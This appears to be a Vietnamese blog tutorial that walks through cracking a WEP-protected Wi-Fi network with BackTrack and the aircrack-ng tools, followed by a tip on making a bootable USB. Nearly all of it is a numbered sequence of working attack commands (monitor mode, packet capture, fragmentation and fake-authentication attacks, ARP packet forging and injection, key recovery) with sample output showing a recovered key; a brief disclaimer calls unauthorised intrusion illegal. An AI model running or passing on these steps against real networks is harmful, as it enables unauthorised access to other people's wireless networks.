Bài này mình tập hợp từ các tip hướng dẫn trên mạng và đã test thành công trên máy mình.
Và xin nhắc lại đây chỉ là bài hướng dẫn nhằm mục đích học hỏi về các kiến thức bảo mật, mọi hành vi xâm nhập vào mạng người khác mà không có sự đông ý là PHẠM PHÁP.
Đầu tiên hãy khởi dộng Backtrack từ CD hoặc USB.
Dùng lênh startx để vào màn hình đồ họa của Backtrack,
Sau đó bật cửa sổ Shell, biểu tượng nhỏ màu đen nằm ở góc trái phía dưới thanh trạng thái.
Mở Shell 1
Dùng lệnh iwconfig để kiểm tra card mạng đang sử dụng của mình.
Như trong hình thì card mạng của mình có tên là wlan0
[1] airmon-ng start wlan0
[2] airodump-ng mon0
Khi đã tìm thấy Access Point (AP) cần lấy pass ta bấm Ctrt + C để dừng quá trình quét.
Kết quả trên màn hình sẽ cho ta thấy địa chỉ MAC của AP (BSSID), Channel (CH), Tên AP (ESSID)
BSSID: 00:14:6C:02:C0:FE
CH: 11
ESSID: NETGEAR
--> chú ý những thông số này sẽ thay đổi theo từng cấu hình máy của bạn, Access Point …
[3] airodump-ng --bssid 00:14:6C:02:C0:FE --channel 11 -w NETGEAT mon0
Khi thực thi xong lệnh trên, thì trên màn hình desktop sẽ xuất hiện một số file mới, ta sẽ chú ý đến file NETGEAR-01.cap vừa mới tạo.
Mở Shell 2
[4] aireplay-ng -5 -b 00:14:6C:02:C0:FE mon0
Chờ một chút, đến khi xuất hiện thông báo Use this packet ? chọn Yes (có thể dùng chữ y)
Mở Shell 3
[5] aireplay-ng -1 1 -a 00:14:6C:02:C0:FE mon0
Quay lại Shell 2 kiểm tra file vừa tạo xong ở đây ta được file fragment-1005-2004845.xor
[6] packetforge-ng -0 -a 00:14:6C:02:C0:FE -h 00:11:22:33:44:55 -l 255.255.255.255 -k 255.255.255.255 -y fragment-1005-2004845.xor -w arpy
[7] aireplay-ng -3 -r arpy -b 00:14:6C:02:C0:FE mon0
Khi thực hiện lệnh trên thì số lượng data thu nhận ở Shell 1 tăng lên nhanh chóng, theo thông tin thì để crack wep 64bit thì cần tối thiểu 20.000 packet, crack wep 128bit thì cần tối thiểu 40.000 packet. Do đó để đạt hiệu quả tối đa bạn nên chờ đến khi đạt đến số lượng như trên để thực hiện tiếp dòng lệnh tiếp theo.
Mở Shell 4
[8] aircrack-ng NETGEAR-01.cap
NETGEAR-01.cap là file được tạo từ bước 1
Và bây giờ bạn hãy xem thành quả của mình.
KEY FOUND ! [D4 :F5 :07 :DE :E5]
Key bạn cần tìm sẽ là D4F507DEE5.
Chú ý:
00:14:6C:02:C0:FE –> địa chỉ Access Point
wlan0 –> tên card mạng của bạn
mon0 –> interface card mạng của bạn
bấm vào hình để xem hình lớn
Tip:
Bạn có thể tạo cho mình bản Backtrack 4 Pre Final boot từ USB bằng cách sử dụng unetbootin-windows-319.exe.
Cách sử dụng rất đơn giản, điều bạn cần làm là đưa USB vào máy.
Ở phần Distribition bạn chọn là Backtrack, ở ô kế tiếp bạn có thể chọn phiên bản, do Backtrack 4 Pre Final vẫn chưa hỗ trợ boot từ USB nên bạn cứ chọn là 3.
Phần Diskimage chọn file iso của Backtrack 4 Pre Final mà bạn đã tải về.
Chọn USB cần tạo ở mục Drive (chương trình sẽ tự chọn nếu bạn chỉ căm 1 usb vào máy)
OK ! và chờ trong ít phút … Enjoy !!!
Download:
Video:
Mở Shell 1Dùng lệnh iwconfig để kiểm tra card mạng đang sử dụng của mình.Như trong hình thì card mạng của mình có tên là wlan0
Chờ một chút, đến khi xuất hiện thông báo Use this packet ? chọn Yes (có thể dùng chữ y)
Không có nhận xét nào:
Đăng nhận xét